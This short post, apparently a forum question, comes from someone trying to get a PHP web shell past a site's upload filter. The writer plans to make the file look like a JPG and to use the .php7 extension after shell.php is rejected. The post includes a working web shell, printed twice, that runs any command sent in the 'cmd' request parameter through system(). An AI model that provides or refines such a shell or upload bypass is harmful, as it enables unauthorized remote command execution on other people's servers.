I want to make the content of the .php file the same as the jpg. In this way, the site will classify the content as jpg while checking.
i can change .jpg to php7
can't upload shell.php
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
i can change .jpg to php7
can't upload shell.php
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>